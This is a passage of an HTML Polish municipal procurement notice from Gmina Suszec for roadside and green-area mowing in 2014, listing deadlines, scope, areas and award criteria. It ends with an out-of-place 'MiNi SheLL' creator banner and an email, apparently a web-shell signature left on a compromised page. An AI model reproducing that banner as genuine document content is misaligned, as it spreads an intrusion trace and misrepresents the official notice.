<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.05.2014 godzina 10:00, miejsce: URZĄD GMINY SUSZEC
UL. LIPOWA 1
43-267 SUSZEC
SEKRETARIAT (I PIĘTRO).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykaszanie i utrzymanie gminnych poboczy dróg oraz miejsc reprezentacyjnych na terenie Gminy Suszec.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia: 
a)	zamówienie obejmuje swym zakresem:
-	roboty przygotowawcze, które wykonawca wykonuje przed rozpoczęciem koszenia, do robót tych zalicza się:
wybranie z trawy kamieni, gruzu, puszek metalowych lub innych 
zanieczyszczeń,
wygrabienie liści, które spadły z drzew,
rozgarnięcie kretowisk,
wycięcie jednorocznych samosiewów i odrostów wokół drzew,
wywóz zebranych zanieczyszczeń na wysypisko publiczne lub składowiska własne, po uzgodnieniu miejsca wywozu z Zamawiającym, 
- koszenie poboczy dróg i terenów zielonych, w tym m.in. skarp, rowów, miejsc niedostępnych, miejsc reprezentacyjnych oraz pozostałych działek gminnych na terenie Gminy Suszec, wykaszanych zgodnie z wytycznymi określonymi w specyfikacji technicznej - zał. nr 8 do SIWZ, a także zgodnie z postanowieniami określonymi w niniejszej SIWZ,
-	dostawę i pracę sprzętu do koszenia,
-	uprzątnięcie skoszonej trawy i chwastów z jezdni i chodników, odtransportowanie sprzętu,
-	kontrolę i pomiary dopuszczalnej wysokości trawy po jej skoszeniu.
		
Usługi objęte tym zadaniem będą świadczone na terenach o łącznej powierzchni: 292.315,70 m2.
Lokalizację terenów podlegających koszeniu i utrzymaniu przedstawiono na mapkach lokalizacyjnych - zał. nr 10.01 - 10.9 do SIWZ, natomiast zestawienie długości i powierzchni (w tym średniej szerokości koszenia) poboczy i miejsc reprezentacyjnych do koszenia wykazano odpowiednio w załącznikach nr 9.1 i 9.2 do SIWZ.
Szerokość koszenia podana w załączniku 9.1 i 9.2 została uśredniona. Do powierzchni koszenia wchodzą zarówno odcinki o mniejszej jak i większej szerokości niż podana szerokość średnia. W przypadku występowania rowów przydrożnych koszeniu podlega pas od krawędzi jezdni do przeciwskarpy włącznie. Po przeprowadzonych pracach należy uprzątnąć zanieczyszczenia z jezdni i chodników.
Zamawiający, dla zadania nr 1, wymaga wykonania nie mniej niż czterech pełnych koszeń na poboczach dróg gminnych, wymienionych w zał. nr 9.1 do SIWZ w okresie obowiązywania umowy i nie mniej niż pięciu pełnych koszeń w miejscach reprezentacyjnych wymienionych w zał. 9.2 do SIWZ, w okresie obowiązywania umowy, w terminach określonych w zał. 6 do SIWZ.

Warunki szczegółowe:
a)	koszenie trawy ma być prowadzone w takich odstępach czasu, aby wysokość trawy nie była większa niż 20 cm (dotyczy tylko zadania nr 1),
b)	wysokość trawy po skoszeniu może maksymalnie wynosić 5 cm,
c)	prace obejmują także wycinkę jednorocznych samosiewów i odrostów,
d)	uprzątnięcie zanieczyszczeń z jezdni i chodników po przeprowadzonych pracach.
Szczegółowy opis przedmiotu zamówienia stanowi: 
a)	specyfikacja techniczna - zał. nr 8 do SIWZ,
b)	zestawienie długości i powierzchni poboczy do koszenia - zał. nr 9.1,
c)	zestawienie długości i powierzchni miejsc reprezentacyjnych do koszenia - zał. nr 9.2,
d)	mapki lokalizacyjne - pobocza i miejsca reprezentacyjne - zał. nr 10.01 - 10.9.

Opis przedmiotu zamówienia wg Wspólnego Słownika Zamówień (CPV):

45233141-9 Roboty w zakresie konserwacji dróg
77314100-5 Usługi w zakresie trawników

Przedmiot zamówienia obejmuje również wszystkie prace i obowiązki wykonawcy wymienione w istotnych postanowieniach umowy - stanowiących załącznik nr 2 do SIWZ. Wykonawca jest zobowiązany do ich uważnego przeanalizowania i zapoznania się z zakresem przedmiotu zamówienia. Zaleca się dokonanie wizji w terenie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.41-9, 77.31.41.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykaszanie i utrzymanie pozostałych działek gminnych na terenie Gminy Suszec.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia: 
a)	zamówienie obejmuje swym zakresem:
-	roboty przygotowawcze, które wykonawca wykonuje przed rozpoczęciem koszenia, do robót tych zalicza się:
wybranie z trawy kamieni, gruzu, puszek metalowych lub innych 
zanieczyszczeń,
wygrabienie liści, które spadły z drzew,
rozgarnięcie kretowisk,
wycięcie jednorocznych samosiewów i odrostów wokół drzew,
wywóz zebranych zanieczyszczeń na wysypisko publiczne lub składowiska własne, po uzgodnieniu miejsca wywozu z Zamawiającym, 
-	koszenie terenów zielonych, w tym m.in. działek gminnych na terenie Gminy Suszec, wykaszanych zgodnie z wytycznymi określonymi w specyfikacji technicznej - zał. nr 8 do SIWZ, a także zgodnie z postanowieniami określonymi w niniejszej SIWZ,
-	dostawę i pracę sprzętu do koszenia,
-	uprzątnięcie skoszonej trawy i chwastów z jezdni i chodników, odtransportowanie sprzętu,
-	kontrolę i pomiary dopuszczalnej wysokości trawy po jej skoszeniu.
		
Usługi objęte tym zadaniem będą świadczone na terenach o łącznej powierzchni:  130.000,00 m2. Zestawienie powierzchni pozostałych terenów gminnych objętych przedmiotem zamówienia wykazano w zał. nr 11 do SIWZ. 
Decyzję dotyczącą zakresu i terminu świadczenia przedmiotu zamówienia na terenach objętych zadaniem nr 2 podejmuje zamawiający. 
Zamawiający, dla zadania nr 2, dla szacowanych powierzchni przedstawionych w zał. nr 11 do SIWZ, termin i szczegółowy zakres prac wskazuje na bieżąco w protokole przekazań i odbiorów pozostałych terenów gminnych objętych przedmiotem zamówienia - załącznik nr 12 do SIWZ.
Warunki szczegółowe:
- wysokość trawy po skoszeniu może maksymalnie wynosić 5 cm,
- prace obejmują także wycinkę jednorocznych samosiewów i odrostów,
- uprzątnięcie zanieczyszczeń z jezdni i chodników po przeprowadzonych pracach.
Szczegółowy opis przedmiotu zamówienia stanowi: 
a)	specyfikacja techniczna - zał. nr 8 do SIWZ,
b)	zestawienie powierzchni pozostałych terenów gminnych objętych przedmiotem zamówienia - zał. nr 11
c)	protokół przekazań i odbiorów pozostałych terenów gminnych objętych przedmiotem zamówienia - zał. nr 12.

Opis przedmiotu zamówienia wg Wspólnego Słownika Zamówień (CPV):

45233141-9 Roboty w zakresie konserwacji dróg
77314100-5 Usługi w zakresie trawników

Przedmiot zamówienia obejmuje również wszystkie prace i obowiązki wykonawcy wymienione w istotnych postanowieniach umowy - stanowiących załącznik nr 2 do SIWZ. Wykonawca jest zobowiązany do ich uważnego przeanalizowania i zapoznania się z zakresem przedmiotu zamówienia. Zaleca się dokonanie wizji w terenie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.41-9, 77.31.41.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com